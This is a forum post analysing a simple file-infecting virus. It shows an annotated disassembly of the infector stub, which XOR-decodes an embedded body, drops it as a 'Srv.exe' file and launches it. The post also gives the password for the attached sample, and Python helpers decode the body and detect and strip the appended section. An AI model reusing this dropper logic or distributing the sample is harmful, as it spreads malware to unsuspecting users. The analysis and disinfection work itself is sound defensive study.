Analysis of a simple virus
This post was last edited by F8LEFT on 2014-10-7 16:42. Hi everyone, I'm F8, a newbie, looking for friends to study this kind of technique together.
I recently got hold of a simple virus and took a quick look at it. There is honestly not much technical content in it, so bear with me.
Of course, I only looked at what the infected file does. The code is very compact, without even a jump, so it was easy to analyze. Haha
Enough talk, let's get started.
-------------------------------- (divider) --------------------------------
10011000  60                 PUSHAD                                    ; save all registers
10011001  E8 00000000        CALL PhysXDev.10011006                    ; call the next instruction
10011006  5D                 POP EBP                                   ; get the current address, 10011006
10011007  8BC5               MOV EAX, EBP                              ; keep the address in EAX
10011009  81ED 326F0120      SUB EBP, 0x20016F32
1001100F  2B85 50720120      SUB EAX, DWORD PTR SS:[EBP+20017250]      ; eax -= [EBP+20017250] (= 6) -> ModuleEntryPoint
10011015  8985 4C720120      MOV DWORD PTR SS:[EBP+2001724C], EAX      ; store the entry point: [EBP+2001724C] = ModuleEntryPoint
1001101B  B0 00              MOV AL, 0x0
1001101D  8685 9E740120      XCHG BYTE PTR SS:[EBP+2001749E], AL       ; fetch the flag: [EBP+2001749E] -> AL (and write 0 back)
10011023  3C 01              CMP AL, 0x1                               ; does the malicious code need to run?
10011025  0F85 DE020000      JNZ <PhysXDev.End>                        ; everything below addresses the module's data relatively: EBP = 10011006 - 20016F32, so EBP plus a nearby constant is really 10011006 plus an offset, and the data is found even if the module is not loaded at 10000000
1001102B  8B85 4C720120      MOV EAX, DWORD PTR SS:[EBP+2001724C]      ; reload ModuleEntryPoint
10011031  2B85 58720120      SUB EAX, DWORD PTR SS:[EBP+20017258]      ; compute the address of the LoadLibraryA import; this API address is one the original dll already has
10011037  8B00               MOV EAX, DWORD PTR DS:[EAX]               ; read the address of LoadLibraryA
10011039  8985 EA730120      MOV DWORD PTR SS:[EBP+200173EA], EAX      ; write it into the stub's IAT: [EBP+200173EA] = LoadLibraryA
1001103F  8B85 4C720120      MOV EAX, DWORD PTR SS:[EBP+2001724C]      ; ModuleEntryPoint
10011045  2B85 5C720120      SUB EAX, DWORD PTR SS:[EBP+2001725C]      ; the original dll's import: GetProcAddress
1001104B  8B00               MOV EAX, DWORD PTR DS:[EAX]
1001104D  8985 F2730120      MOV DWORD PTR SS:[EBP+200173F2], EAX      ; write it into the stub's IAT: [EBP+200173F2] = GetProcAddress
10011053  83BD F2730120 00   CMP DWORD PTR SS:[EBP+200173F2], 0x0
1001105A  0F84 A9020000      JE <PhysXDev.End>
10011060  83BD EA730120 00   CMP DWORD PTR SS:[EBP+200173EA], 0x0
10011067  0F84 9C020000      JE <PhysXDev.End>                         ; make sure both API addresses are valid; next, resolve the APIs the stub needs
1001106D  8D85 8D740120      LEA EAX, DWORD PTR SS:[EBP+2001748D]
10011073  50                 PUSH EAX                                  ; str:"kernel32.dll"
10011074  FF95 EA730120      CALL NEAR DWORD PTR SS:[EBP+200173EA]     ; LoadLibraryA("kernel32.dll")
1001107A  83F8 00            CMP EAX, 0x0                              ; did the dll load?
1001107D  0F84 86020000      JE <PhysXDev.End>
10011083  8985 E6730120      MOV DWORD PTR SS:[EBP+200173E6], EAX      ; save the dll base (hDll)
10011089  8D85 16740120      LEA EAX, DWORD PTR SS:[EBP+20017416]
1001108F  50                 PUSH EAX                                  ; str:"FreeLibrary"
10011090  FFB5 E6730120      PUSH DWORD PTR SS:[EBP+200173E6]          ; hDll
10011096  FF95 F2730120      CALL NEAR DWORD PTR SS:[EBP+200173F2]     ; GetProcAddress(hDll, "FreeLibrary")
1001109C  83F8 00            CMP EAX, 0x0
1001109F  0F84 58020000      JE <PhysXDev.End2>
100110A5  8985 EE730120      MOV DWORD PTR SS:[EBP+200173EE], EAX      ; stub IAT = FreeLibrary
100110AB  8D85 22740120      LEA EAX, DWORD PTR SS:[EBP+20017422]
100110B1  50                 PUSH EAX                                  ; str:"CreateMutexA"
100110B2  FFB5 E6730120      PUSH DWORD PTR SS:[EBP+200173E6]          ; hDll
100110B8  FF95 F2730120      CALL NEAR DWORD PTR SS:[EBP+200173F2]     ; GetProcAddress(hDll, "CreateMutexA")
100110BE  83F8 00            CMP EAX, 0x0
100110C1  0F84 36020000      JE <PhysXDev.End2>
100110C7  8985 F6730120      MOV DWORD PTR SS:[EBP+200173F6], EAX      ; stub IAT = CreateMutexA
100110CD  8D85 3B740120      LEA EAX, DWORD PTR SS:[EBP+2001743B]
100110D3  50                 PUSH EAX                                  ; str:"ReleaseMutex"
100110D4  FFB5 E6730120      PUSH DWORD PTR SS:[EBP+200173E6]          ; hDll
100110DA  FF95 F2730120      CALL NEAR DWORD PTR SS:[EBP+200173F2]     ; GetProcAddress(hDll, "ReleaseMutex")
100110E0  83F8 00            CMP EAX, 0x0
100110E3  0F84 14020000      JE <PhysXDev.End2>
100110E9  8985 FE730120      MOV DWORD PTR SS:[EBP+200173FE], EAX      ; stub IAT = ReleaseMutex
100110EF  8D85 2F740120      LEA EAX, DWORD PTR SS:[EBP+2001742F]
100110F5  50                 PUSH EAX                                  ; str:"CloseHandle"
100110F6  FFB5 E6730120      PUSH DWORD PTR SS:[EBP+200173E6]          ; hDll
100110FC  FF95 F2730120      CALL NEAR DWORD PTR SS:[EBP+200173F2]     ; GetProcAddress(hDll, "CloseHandle")
10011102  83F8 00            CMP EAX, 0x0
10011105  0F84 F2010000      JE <PhysXDev.End2>
1001110B  8985 FA730120      MOV DWORD PTR SS:[EBP+200173FA], EAX      ; stub IAT = CloseHandle
10011111  8D85 48740120      LEA EAX, DWORD PTR SS:[EBP+20017448]
10011117  50                 PUSH EAX                                  ; str:"GetLastError"
10011118  FFB5 E6730120      PUSH DWORD PTR SS:[EBP+200173E6]          ; hDll
1001111E  FF95 F2730120      CALL NEAR DWORD PTR SS:[EBP+200173F2]     ; GetProcAddress(hDll, "GetLastError")
10011124  83F8 00            CMP EAX, 0x0
10011127  0F84 D0010000      JE <PhysXDev.End2>
1001112D  8985 02740120      MOV DWORD PTR SS:[EBP+20017402], EAX      ; stub IAT = GetLastError
10011133  8D85 55740120      LEA EAX, DWORD PTR SS:[EBP+20017455]
10011139  50                 PUSH EAX                                  ; str:"CreateFileA"
1001113A  FFB5 E6730120      PUSH DWORD PTR SS:[EBP+200173E6]          ; hDll
10011140  FF95 F2730120      CALL NEAR DWORD PTR SS:[EBP+200173F2]     ; GetProcAddress(hDll, "CreateFileA")
10011146  83F8 00            CMP EAX, 0x0
10011149  0F84 AE010000      JE <PhysXDev.End2>
1001114F  8985 06740120      MOV DWORD PTR SS:[EBP+20017406], EAX      ; stub IAT = CreateFileA
10011155  8D85 61740120      LEA EAX, DWORD PTR SS:[EBP+20017461]
1001115B  50                 PUSH EAX                                  ; str:"WriteFile"
1001115C  FFB5 E6730120      PUSH DWORD PTR SS:[EBP+200173E6]          ; hDll
10011162  FF95 F2730120      CALL NEAR DWORD PTR SS:[EBP+200173F2]     ; GetProcAddress(hDll, "WriteFile")
10011168  83F8 00            CMP EAX, 0x0
1001116B  0F84 8C010000      JE <PhysXDev.End2>
10011171  8985 0A740120      MOV DWORD PTR SS:[EBP+2001740A], EAX      ; stub IAT = WriteFile
10011177  8D85 6B740120      LEA EAX, DWORD PTR SS:[EBP+2001746B]
1001117D  50                 PUSH EAX                                  ; str:"GetModuleFileNameA"
1001117E  FFB5 E6730120      PUSH DWORD PTR SS:[EBP+200173E6]          ; hDll
10011184  FF95 F2730120      CALL NEAR DWORD PTR SS:[EBP+200173F2]     ; GetProcAddress(hDll, "GetModuleFileNameA")
1001118A  83F8 00            CMP EAX, 0x0
1001118D  0F84 6A010000      JE <PhysXDev.End2>
10011193  8985 0E740120      MOV DWORD PTR SS:[EBP+2001740E], EAX      ; stub IAT = GetModuleFileNameA
10011199  8D85 7E740120      LEA EAX, DWORD PTR SS:[EBP+2001747E]
1001119F  50                 PUSH EAX                                  ; str:"CreateProcessA"
100111A0  FFB5 E6730120      PUSH DWORD PTR SS:[EBP+200173E6]          ; hDll
100111A6  FF95 F2730120      CALL NEAR DWORD PTR SS:[EBP+200173F2]     ; GetProcAddress(hDll, "CreateProcessA")
100111AC  83F8 00            CMP EAX, 0x0
100111AF  0F84 48010000      JE <PhysXDev.End2>
100111B5  8985 12740120      MOV DWORD PTR SS:[EBP+20017412], EAX      ; stub IAT = CreateProcessA
100111BB  8D85 78720120      LEA EAX, DWORD PTR SS:[EBP+20017278]      ; ---------------------------------------------> single-instance check
100111C1  50                 PUSH EAX                                  ; str:"KyUffThOkYwRRtgPP"
100111C2  6A 01              PUSH 0x1
100111C4  6A 00              PUSH 0x0
100111C6  FF95 F6730120      CALL NEAR DWORD PTR SS:[EBP+200173F6]     ; CreateMutexA(0, 1, "KyUffThOkYwRRtgPP")
100111CC  50                 PUSH EAX                                  ; keep the mutex handle
100111CD  FF95 02740120      CALL NEAR DWORD PTR SS:[EBP+20017402]     ; GetLastError
100111D3  5B                 POP EBX                                   ; EBX = mutex handle
100111D4  50                 PUSH EAX                                  ; keep the error code
100111D5  53                 PUSH EBX
100111D6  53                 PUSH EBX
100111D7  FF95 FE730120      CALL NEAR DWORD PTR SS:[EBP+200173FE]     ; ReleaseMutex(hMutex)
100111DD  FF95 FA730120      CALL NEAR DWORD PTR SS:[EBP+200173FA]     ; CloseHandle(hMutex)
100111E3  58                 POP EAX                                   ; EAX = error code
100111E4  3D B7000000        CMP EAX, 0xB7                             ; 0xB7 = ERROR_ALREADY_EXISTS: is the virus process already running?
100111E9  0F84 0E010000      JE <PhysXDev.End2>                        ; <--------------------------------------------------
100111EF  8B8D 9A740120      MOV ECX, DWORD PTR SS:[EBP+2001749A]      ; length of the original virus program
100111F5  8DBD 9E740120      LEA EDI, DWORD PTR SS:[EBP+2001749E]      ; location of the original virus program (encrypted)
100111FB  47                 INC EDI                                   ; skip the flag byte
100111FC  BA 00000000        MOV EDX, 0x0
10011201  0BD2               OR EDX, EDX
10011203  75 07              JNZ SHORT PhysXDev.1001120C
10011205  8B95 60720120      MOV EDX, DWORD PTR SS:[EBP+20017260]      ; length of the decode key
1001120B  4A                 DEC EDX
1001120C  8A9C2A 64720120    MOV BL, BYTE PTR DS:[EDX+EBP+20017264]    ; the matching key byte
10011213  321F               XOR BL, BYTE PTR DS:[EDI]                 ; virus program xor key = restored program
10011215  881F               MOV BYTE PTR DS:[EDI], BL                 ; write the original code back in place
10011217  47                 INC EDI
10011218  4A                 DEC EDX
10011219  E2 E6              LOOPD SHORT PhysXDev.10011201             ; decode loop, nothing more than a simple xor
1001121B  68 FF000000        PUSH 0xFF
10011220  8D85 92720120      LEA EAX, DWORD PTR SS:[EBP+20017292]      ; buffer for the name
10011226  50                 PUSH EAX
10011227  6A 00              PUSH 0x0
10011229  FF95 0E740120      CALL NEAR DWORD PTR SS:[EBP+2001740E]     ; GetModuleFileNameA(0, szName, 0xFF)
1001122F  8BC8               MOV ECX, EAX                              ; save the length
10011231  8D9D 92720120      LEA EBX, DWORD PTR SS:[EBP+20017292]      ; address of the current program's name
10011237  03C3               ADD EAX, EBX                              ; point at the last character
10011239  FD                 STD
1001123A  8BF8               MOV EDI, EAX
1001123C  B0 2E              MOV AL, 0x2E                              ; ASCII "."
1001123E  F2:AE              REPNE SCAS BYTE PTR ES:[EDI]              ; scan backwards from the end until the "." is found
10011240  47                 INC EDI
10011241  FC                 CLD
10011242  8DB5 8A720120      LEA ESI, DWORD PTR SS:[EBP+2001728A]      ; str "Srv.exe"
10011248  B9 08000000        MOV ECX, 0x8
1001124D  F3:A4              REP MOVS BYTE PTR ES:[EDI], BYTE PTR DS:[ESI] ; splice the strings together
1001124F  6A 00              PUSH 0x0                                  ; e.g. E:\LoadDll.exe becomes E:\LoadDllSrv.exe
10011251  68 80000000        PUSH 0x80                                 ; FILE_ATTRIBUTE_NORMAL
10011256  6A 02              PUSH 0x2                                  ; CREATE_ALWAYS
10011258  6A 00              PUSH 0x0
1001125A  6A 02              PUSH 0x2                                  ; FILE_SHARE_WRITE
1001125C  68 00000040        PUSH 0x40000000                           ; GENERIC_WRITE
10011261  8D85 92720120      LEA EAX, DWORD PTR SS:[EBP+20017292]
10011267  50                 PUSH EAX
10011268  FF95 06740120      CALL NEAR DWORD PTR SS:[EBP+20017406]     ; CreateFileA(Name, 0x40000000, ...): create the virus file
1001126E  83F8 FF            CMP EAX, -0x1
10011271  0F84 86000000      JE <PhysXDev.End2>
10011277  50                 PUSH EAX                                  ; keep hFile on the stack for the CloseHandle below
10011278  8BD0               MOV EDX, EAX
1001127A  6A 00              PUSH 0x0                                  ; lpOverlapped
1001127C  8D85 48720120      LEA EAX, DWORD PTR SS:[EBP+20017248]
10011282  50                 PUSH EAX                                  ; lpNumberOfBytesWritten
10011283  FFB5 9A740120      PUSH DWORD PTR SS:[EBP+2001749A]          ; length
10011289  8D9D 9E740120      LEA EBX, DWORD PTR SS:[EBP+2001749E]
1001128F  43                 INC EBX                                   ; decoded body (after the flag byte)
10011290  53                 PUSH EBX
10011291  52                 PUSH EDX                                  ; hFile
10011292  FF95 0A740120      CALL NEAR DWORD PTR SS:[EBP+2001740A]     ; WriteFile(...): write the virus file
10011298  FF95 FA730120      CALL NEAR DWORD PTR SS:[EBP+200173FA]     ; CloseHandle(hFile)
1001129E  FC                 CLD
1001129F  B9 44000000        MOV ECX, 0x44                             ; sizeof(STARTUPINFOA)
100112A4  8DBD 92730120      LEA EDI, DWORD PTR SS:[EBP+20017392]
100112AA  B0 00              MOV AL, 0x0
100112AC  F3:AA              REP STOS BYTE PTR ES:[EDI]                ; zero the STARTUPINFO
100112AE  B9 10000000        MOV ECX, 0x10                             ; sizeof(PROCESS_INFORMATION)
100112B3  8DBD D6730120      LEA EDI, DWORD PTR SS:[EBP+200173D6]
100112B9  B0 00              MOV AL, 0x0
100112BB  F3:AA              REP STOS BYTE PTR ES:[EDI]                ; zero the PROCESS_INFORMATION
100112BD  8D85 D6730120      LEA EAX, DWORD PTR SS:[EBP+200173D6]
100112C3  50                 PUSH EAX                                  ; lpProcessInformation
100112C4  8D85 92730120      LEA EAX, DWORD PTR SS:[EBP+20017392]
100112CA  50                 PUSH EAX                                  ; lpStartupInfo
100112CB  6A 00              PUSH 0x0
100112CD  6A 00              PUSH 0x0
100112CF  6A 00              PUSH 0x0
100112D1  6A 00              PUSH 0x0
100112D3  6A 00              PUSH 0x0
100112D5  6A 00              PUSH 0x0
100112D7  8D85 92720120      LEA EAX, DWORD PTR SS:[EBP+20017292]
100112DD  50                 PUSH EAX                                  ; lpCommandLine = the new file name
100112DE  6A 00              PUSH 0x0
100112E0  FF95 12740120      CALL NEAR DWORD PTR SS:[EBP+20017412]     ; CreateProcessA(...): run the virus file just written
100112E6  8DBD D6730120      LEA EDI, DWORD PTR SS:[EBP+200173D6]
100112EC  FF37               PUSH DWORD PTR DS:[EDI]                   ; hProcess
100112EE  FF77 04            PUSH DWORD PTR DS:[EDI+4]                 ; hThread
100112F1  FF95 FA730120      CALL NEAR DWORD PTR SS:[EBP+200173FA]     ; CloseHandle(hThread) (top of stack first)
100112F7  FF95 FA730120      CALL NEAR DWORD PTR SS:[EBP+200173FA]     ; CloseHandle(hProcess)
100112FD  FFB5 E6730120      PUSH DWORD PTR SS:[EBP+200173E6]          ; <PhysXDev.End2>: hDll
10011303  FF95 EE730120      CALL NEAR DWORD PTR SS:[EBP+200173EE]     ; FreeLibrary(kernel32.dll)
10011309  8B85 4C720120      MOV EAX, DWORD PTR SS:[EBP+2001724C]      ; <PhysXDev.End>: ModuleEntryPoint
1001130F  2B85 54720120      SUB EAX, DWORD PTR SS:[EBP+20017254]      ; minus the stored delta = original dll entry point
10011315  894424 1C          MOV DWORD PTR SS:[ESP+1C], EAX            ; overwrite the EAX slot saved by PUSHAD
10011319  61                 POPAD                                     ; EAX now holds the original dll entry point
1001131A  FFE0               JMP NEAR EAX                              ; PhysXDev.10002A1F
Please note: the attached dll is a virus, do not open it carelessly!!!! If you get infected because you didn't read this notice, don't blame me...
Attachment extraction password: 123
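As an added example (my own code, not F8LEFT's or the sample's), here is the decode loop at 10011201..10011219 rewritten in Python so the key indexing can be checked rather than taken on trust: EDX walks the key backwards, and because it is reset to len(key)-1 whenever it is 0 before the byte is used, key[0] is never consumed. The key and body bytes below are constructed test values; the sample's real key and body are not in this post.

```python
def decode_body(encrypted: bytes, key: bytes) -> bytes:
    """Mirror of the stub's loop at 10011201..10011219 (added example, not the
    sample's code). ECX = body length, EDI = body pointer, EDX = key index.
    At the top of each iteration EDX is tested; if it is 0 it becomes
    len(key) - 1. The key byte at EDX is XORed into the body byte and EDX is
    then decremented, so the key is consumed backwards and, because the reset
    happens before the byte is used, key[0] is never touched.
    """
    if len(key) < 2:
        # with a one-byte key the real loop would index before the key buffer
        raise ValueError("key must be at least 2 bytes long")
    out = bytearray(len(encrypted))
    edx = 0
    for i, b in enumerate(encrypted):       # LOOPD: one pass per body byte
        if edx == 0:                        # OR EDX,EDX / JNZ
            edx = len(key) - 1              # MOV EDX,[key_len] / DEC EDX
        out[i] = b ^ key[edx]               # MOV BL,key[EDX] / XOR BL,[EDI] / MOV [EDI],BL
        edx -= 1                            # DEC EDX
    return bytes(out)


def key_bytes_used(key: bytes) -> bytes:
    """The key bytes the loop can ever use, in the order it cycles through them."""
    return bytes(reversed(key[1:]))


# XOR is symmetric, so the same routine encodes.  Constructed test values:
SAMPLE_KEY = b"ABCD"
SAMPLE_PLAIN = b"MZ\x90\x00\x03\x00"


def roundtrip(plain: bytes = SAMPLE_PLAIN, key: bytes = SAMPLE_KEY) -> bool:
    """Encoding then decoding with the same key must give the input back."""
    return decode_body(decode_body(plain, key), key) == plain


if __name__ == "__main__":
    # XORing zeros exposes the key order actually used: b'DCBDCB' for key ABCD
    print(decode_body(b"\x00" * 6, SAMPLE_KEY))
    print(key_bytes_used(SAMPLE_KEY), roundtrip())
```

Feeding all-zero input is a quick way to see the effective key stream; for an analyst this matters because a key dumped from the data area will appear one byte longer than the stream the loop really uses.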
A newbie like me doesn't understand it and doesn't dare download and open it, heh.
After analyzing it, how do you deal with it???
Respect to those who can analyze viruses...
heizihui posted on 2014-10-7 20:00:
After analyzing it, how do you deal with it???
Learning the virus's techniques and ideas is what matters; dealing with it is actually quite simple.
This virus mainly adds a section and does not modify the original file's code. As you can see, at the very end it still has to jump back to the original entry point. So if you want to disinfect it, you can delete the added section and then fix the entry point, and that's it. You don't even need to delete the file...
Awesome, respect to F8 for analyzing the virus. So envious, when will I have skills like this
Not bad; I copied it into Notepad to read, the code as displayed here is really hard to look at
Respect~~
Learned something; could you also analyze the generated virus program...
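To make the disinfection idea above concrete, here is an added Python example (mine, not from the thread or the sample) that builds a constructed PE32 image whose last section is writable and executable and holds the entry point, flags that shape, then strips the section and restores the entry point. The original entry RVA is passed in explicitly: in the real sample it has to be recovered from the stub's final MOV/SUB (its own entry minus the stored delta). The names `build_toy_pe`, `suspicious_entry` and `strip_last_section` are mine, and the toy image is a test fixture, not a real binary.

```python
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
SECTION_ENTRY = 40  # size of one IMAGE_SECTION_HEADER


def _layout(pe: bytes):
    """Offsets of the COFF header, optional header and section table (PE32)."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    coff = e_lfanew + 4
    nsec = struct.unpack_from("<H", pe, coff + 2)[0]        # NumberOfSections
    size_opt = struct.unpack_from("<H", pe, coff + 16)[0]   # SizeOfOptionalHeader
    opt = coff + 20
    return coff, opt, opt + size_opt, nsec


def sections(pe: bytes):
    _, _, table, nsec = _layout(pe)
    out = []
    for i in range(nsec):
        off = table + i * SECTION_ENTRY
        vsize, va, rawsize, rawptr = struct.unpack_from("<IIII", pe, off + 8)
        out.append({"name": pe[off:off + 8].rstrip(b"\0"), "va": va, "vsize": vsize,
                    "raw": rawptr, "rawsize": rawsize,
                    "chars": struct.unpack_from("<I", pe, off + 36)[0]})
    return out


def entry_point(pe: bytes) -> int:
    return struct.unpack_from("<I", pe, _layout(pe)[1] + 16)[0]   # AddressOfEntryPoint


def suspicious_entry(pe: bytes) -> bool:
    """Shape left by an appended-section infector that decodes itself in place:
    the entry point lies in the LAST section and that section is writable+executable."""
    last = sections(pe)[-1]
    ep = entry_point(pe)
    in_last = last["va"] <= ep < last["va"] + max(last["vsize"], last["rawsize"])
    wx = IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE
    return in_last and (last["chars"] & wx) == wx


def strip_last_section(pe: bytes, original_ep: int) -> bytes:
    """Drop the last section (header entry and raw data), restore the entry point
    and shrink SizeOfImage.  original_ep must come from analysis of the stub."""
    coff, opt, table, nsec = _layout(pe)
    secs = sections(pe)
    if nsec < 2:
        raise ValueError("nothing to strip")
    last, prev = secs[-1], secs[-2]
    # only truncate when the section's raw data really is the tail of the file
    cut = last["raw"] if last["raw"] + last["rawsize"] >= len(pe) else len(pe)
    buf = bytearray(pe[:cut])
    hdr = table + (nsec - 1) * SECTION_ENTRY
    buf[hdr:hdr + SECTION_ENTRY] = b"\0" * SECTION_ENTRY
    struct.pack_into("<H", buf, coff + 2, nsec - 1)
    struct.pack_into("<I", buf, opt + 16, original_ep)
    align = struct.unpack_from("<I", buf, opt + 32)[0]            # SectionAlignment
    end = prev["va"] + max(prev["vsize"], prev["rawsize"])
    struct.pack_into("<I", buf, opt + 56, -(-end // align) * align)  # SizeOfImage
    return bytes(buf)


def build_toy_pe(infected: bool) -> bytes:
    """Constructed PE32 fixture: .text/.data, plus an appended W+X section that
    owns the entry point when infected=True.  Not a loadable program."""
    sect_align, file_align, hdr_size = 0x1000, 0x200, 0x200
    secs = [(b".text", 0x1000, IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_EXECUTE),
            (b".data", 0x2000, IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE)]
    if infected:
        secs.append((b".vir", 0x3000,
                     IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE))
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                                  # PE32 magic
    struct.pack_into("<I", opt, 16, secs[-1][1] + 0x10 if infected else 0x1010)
    struct.pack_into("<IIII", opt, 28, 0x10000000, sect_align, file_align, 0)
    struct.pack_into("<I", opt, 56, secs[-1][1] + sect_align)              # SizeOfImage
    struct.pack_into("<I", opt, 60, hdr_size)                              # SizeOfHeaders
    coff = struct.pack("<HHIIIHH", 0x14C, len(secs), 0, 0, 0, len(opt), 0x2102)
    table, raw = b"", b""
    for i, (name, va, chars) in enumerate(secs):
        table += name.ljust(8, b"\0") + struct.pack(
            "<IIIIIIHHI", file_align, va, file_align, hdr_size + i * file_align,
            0, 0, 0, 0, chars)
        raw += b"\x90" * file_align
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                                # e_lfanew
    return (bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table).ljust(hdr_size, b"\0") + raw


if __name__ == "__main__":
    bad = build_toy_pe(True)
    print(suspicious_entry(bad), [s["name"] for s in sections(bad)])
    fixed = strip_last_section(bad, 0x1010)
    print(suspicious_entry(fixed), fixed == build_toy_pe(False))
```

The heuristic is deliberately narrow (entry point in a writable+executable last section) because that is exactly what this stub needs: it XORs its body in place and then runs it. A repair tool should still verify that nothing else was touched (here the stub only reads the original dll's import table, so the rest of the file is expected to be unchanged) before relying on a header fix alone.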